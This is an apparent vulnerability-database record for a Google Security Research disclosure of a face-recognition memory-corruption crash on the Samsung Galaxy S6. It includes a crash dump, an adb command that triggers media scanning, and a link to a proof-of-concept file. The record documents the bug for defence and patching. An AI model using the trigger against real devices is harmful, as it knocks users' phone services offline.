ID
VAR-E-201602-0156
EDB ID
39425
TITLE
Samsung Galaxy S6 - 'android.media.process' 'MdConvertLine' Face Recognition Memory Corruption - Android dos Exploit
Trust: 0.6
DESCRIPTION
Samsung Galaxy S6 - 'android.media.process' 'MdConvertLine' Face Recognition Memory Corruption. DoS exploit for the Android platform.
Trust: 0.6
AFFECTED PRODUCTS
vendor: | samsung | model: | galaxy s6 | scope: | - | version: | - | Trust: 1.6 |
EXPLOIT
Source: https://code.google.com/p/google-security-research/issues/detail?id=616
The attached file causes memory corruption when it is scanned by the face recognition library in android.media.process
F/libc ( 4134): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x33333333333358 in tid 12161 (syncThread)
I/DEBUG ( 3021): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG ( 3021): Build fingerprint: 'Verizon/zeroltevzw/zeroltevzw:5.1.1/LMY47X/G925VVRU4BOG9:user/release-keys'
I/DEBUG ( 3021): Revision: '10'
I/DEBUG ( 3021): ABI: 'arm64'
I/DEBUG ( 3021): pid: 4134, tid: 12161, name: syncThread >>> android.process.media <<<
I/DEBUG ( 3021): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x33333333333358
I/DEBUG ( 3021): x0 3333333333333330 x1 0000007f714b6800 x2 000000000000001f x3 3333333333333330
I/DEBUG ( 3021): x4 0000007f817fedb8 x5 0000007f7c1f4ea8 x6 0000007f7c1f4ec0 x7 0000007f7c109680
I/DEBUG ( 3021): x8 304b333333333333 x9 3033330333000000 x10 3333333333333333 x11 0103304b33333333
I/DEBUG ( 3021): x12 0000040033300311 x13 0300035033333333 x14 0300303333233333 x15 0000000000001484
I/DEBUG ( 3021): x16 0000007f74bfe828 x17 0000007f8c086008 x18 0000007f8c13b830 x19 0000007f7c279a00
I/DEBUG ( 3021): x20 0000000000000000 x21 0000007f7c1036a0 x22 0000007f817ff440 x23 0000007f7c279a10
I/DEBUG ( 3021): x24 0000000032d231a0 x25 0000000000000065 x26 0000000032d28880 x27 0000000000000065
I/DEBUG ( 3021): x28 0000000000000000 x29 0000007f817fecb0 x30 0000007f740be014
I/DEBUG ( 3021): sp 0000007f817fecb0 pc 0000007f740cefdc pstate 0000000080000000
I/DEBUG ( 3021):
I/DEBUG ( 3021): backtrace:
I/DEBUG ( 3021): #00 pc 0000000000065fdc /system/lib64/libfacerecognition.so (MdConvertLine+28)
I/DEBUG ( 3021): #01 pc 0000000000055010 /system/lib64/libfacerecognition.so (MCC_Process+160)
To reproduce, download the attached file and wait, or trigger media scanning by calling:
adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39425.zip
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'android.media.process' 'MdConvertLine' Face Recognition Memory Corruption
Trust: 1.0
CREDITS
Google Security Research
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 39425 | Trust: 1.6 |
db: | EDBNET | id: | 60710 | Trust: 0.6 |
REFERENCES
url: | https://code.google.com/p/google-security-research/issues/detail?id=616 | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/39425/ | Trust: 0.6 |
SOURCES
db: | EXPLOIT-DB | id: | 39425 |
db: | EDBNET | id: | 60710 |
LAST UPDATE DATE
2022-07-27T09:32:35.040000+00:00
SOURCES RELEASE DATE
db: | EXPLOIT-DB | id: | 39425 | date: | 2016-02-08T00:00:00 |
db: | EDBNET | id: | 60710 | date: | 2016-02-08T00:00:00 |